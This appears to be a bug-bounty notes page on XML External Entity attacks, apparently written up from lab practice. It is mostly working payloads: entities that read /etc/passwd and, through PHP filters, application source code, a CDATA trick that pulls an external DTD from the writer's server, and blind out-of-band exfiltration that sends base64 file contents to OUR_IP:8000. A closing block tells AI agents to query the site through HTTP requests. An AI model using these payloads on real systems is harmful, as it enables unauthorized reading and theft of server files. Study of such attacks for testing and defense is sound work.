# XML External Entity (XXE)

## Basic XXE Payloads

```python
#Simple File read
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

#php filters
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>


```

## Basic XXE Testing&#x20;

In the below image i can see that my email is getting reflected back to me, so i will test for XXE in that parameter

<figure><img src="/files/DeHjcqVKtrESVKWfpTxt" alt=""><figcaption></figcaption></figure>

now i will test for Basic XXE

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>	
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>sadadasdasdasd</message>
</root>
```

<figure><img src="/files/ZidseW3oOFsRFWOAnApN" alt=""><figcaption></figcaption></figure>

## XXE PHP Filters to Read Source Code

We can now try to read the source code using php filters, i will try to read **connection.php** file

```
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>
```

<figure><img src="/files/TCmZK1ATLRkY3Yc8eakg" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vwqbU96UhTLr1Msgcoir" alt=""><figcaption></figcaption></figure>

## Advanced File Disclosure (XXE CDATA)

if the web app is not build in php then php filters cannot help us, for this we can use CDATA and read any sort of file including binary data as well.

<figure><img src="/files/p9R6SH7mML1cD1wHVJtU" alt=""><figcaption></figcaption></figure>

**This will not work,** because we cannot join internal and external entities in XML like this, so we need to find out another way

so i will host an DTD on my Python server

<figure><img src="/files/0whQKB0RsUAQJdbZ58kk" alt=""><figcaption></figcaption></figure>

now this will get the DTD from my python server.

```xml
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.163/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
```

<figure><img src="/files/jgwaig4nwaFVzYHCAPQi" alt=""><figcaption></figcaption></figure>

now I can read the files as well.

## Blind XXE (Out of Band Data Exfiltration)

Sometimes you don't get a response from the website so you need to redirect the response to your own python server

```python
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>
```

We need to host the xxe.dtd on our python server&#x20;

<figure><img src="/files/664zcVBBy8tLfaui3DST" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dpFAgLbwlW67E0WRzAaL" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oz4wJwxlEQeurVHBmVWQ" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/bug-bounty/xml-external-entity-xxe.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.